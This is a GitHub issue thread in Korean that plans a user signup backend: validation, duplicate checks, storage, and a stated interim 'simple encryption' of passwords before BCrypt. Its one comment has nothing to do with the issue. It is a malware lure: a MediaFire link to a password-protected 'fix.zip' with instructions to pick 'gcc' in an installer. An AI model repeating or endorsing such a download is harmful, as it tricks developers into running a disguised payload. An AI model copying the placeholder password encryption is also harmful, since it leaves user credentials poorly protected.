### ISSUE TITLE
[Feat] 회원가입 기능 구현

### ISSUE THREAD

**Issue by LLSNsssz** [Ormi5-StrikeOut/Play-Baseball#23]
## 💡 개요
회원가입 기능의 기본적인 백엔드 로직을 개발하여 사용자들이 서비스에 계정을 만들 수 있도록 합니다. 이메일 인증과 전화번호 인증은 추후 구현 예정입니다.

## 🤩 기능 설명
새로운 사용자의 회원가입 요청을 처리하는 백엔드 API를 구현합니다. 이 기능은 기본적인 사용자 정보를 받아 유효성을 검사하고, 데이터베이스에 저장합니다.

## 🍒 세부 기능
다음과 같은 세부 기능을 구현합니다:
- [x] 회원가입 API 엔드포인트 개발
- [x] 이메일,  주소 형식 유효성 검사 로직
- [x] 비밀번호 강도 검증 로직
- [x] 중복 이메일, 닉네임, 핸드폰번호 확인 로직
- [x] 사용자 정보 데이터베이스 저장 기능
- [x] 비밀번호 암호화 구현

## 📖 참고 사항
- 비밀번호 암호화:
  - 1단계: 현재 구현에서는 간단한 암호화 방식을 사용하여 비밀번호를 저장합니다.
  - 2단계: Spring Security 도입 시, BCrypt 알고리즘을 사용하여 비밀번호 암호화를 강화할 예정입니다.
- 개인정보보호법 준수를 위한 기본적인 데이터 처리 로직 추후 구현 예정
- 유닛 테스트 및 통합 테스트 코드 작성 필요
- 이메일 인증과 전화번호 인증은 향후 별도 이슈로 생성하여 구현 예정
- 회원가입 완료 후 간단한 환영 메시지 response에 포함 (이메일 발송은 추후 구현)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
